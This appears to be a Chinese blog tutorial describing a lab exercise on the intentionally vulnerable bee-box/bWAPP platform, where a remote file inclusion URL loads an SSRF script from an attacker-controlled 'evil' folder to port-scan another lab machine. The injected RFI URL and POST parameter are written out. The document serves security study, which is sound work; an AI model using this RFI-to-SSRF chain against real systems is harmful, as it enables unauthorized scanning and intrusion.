利用bee_box 平台测试端口扫描

一、软件硬件平台

  1. 操作系统:windows 7、windows 2003、bee-box v1.6、windows 10
  2. 硬件平台:12g内存
  3. 软件:Firefox、xampp、hackbarvmware workstations

二、端口扫描

  1. 安装bee-box

Bee系统是一个Ubuntu系统,但是对命令行界面的操作不多,不需要过多的配置,使用web进行远程操作所以使用起来是相当方便的。使用vmware安装bee后可以看到这样的界面。

 

  2.使用web连接bee

因为是Ubuntu系统,所以直接使用命令行界面查看ip地址。这里的地址是:192.168.216.136,用Firefox浏览器登陆bee时点击bwapp后需要输入用户和密码才能继续进行本次实验。

  3.选择SSRF

找到Server Side Request Forgery(SSRF),点进去后点击第一个选项拿到SSRF攻击脚本。把脚本用TXT保存起来并命名为ssrf-1.txt

  4.存放攻击脚本

开启作为攻击的服务器,也就是win2003:192.168.216.127,在根目录上新建文件夹evil,并且把ssrf-1.txt放在evil里面,形成URL:192.168.216.127\evil\ssrf.txt

  5.开启被攻击的服务器

本次实验是端口扫描,所以只要保证被攻击的服务器是开启的状态的可以了,并不需要对其进行访问。实验用机的地址为:192.168.216.128。

  6.选择RFI LFI

回到浏览器下的bee页面,在右上选择Remote & Local File Inclusion (RFI/LFI),可以看到一个选择语言的的选项,默认英语直接点击go,生成了一条URL:http://192.168.216.136/bWAPP/rlfi.php?language=lang_en.php&action=go

  7.打开hackbar

打开Firefox的hackbar工具,把上面获取的URL中的lang_en.php替换成http://192.168.216.127/evil/ssrf.txt,也就是:http://192.168.216.136/bWAPP/rlfi.php?language=http://192.168.216.127/evil/ssrf-1.txt&action=go,让网站直接读取脚本文件。勾选post data后在下面的文本框里输入:ip=192.168.216.128,指定端口扫描的服务器地址。

  8.进行端口扫描

点击左边的Execute提交数据,可以看到端口扫描的结果是80和3306端口是开放的。

到192.168.216.128查看开放的端口,发现确实是80和3306端口

  9.测试

这个时候我们关闭被攻击服务器的80端口,回到hackbar重新提交数据,可以看到端口扫描的结果只有一个3306端口。

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值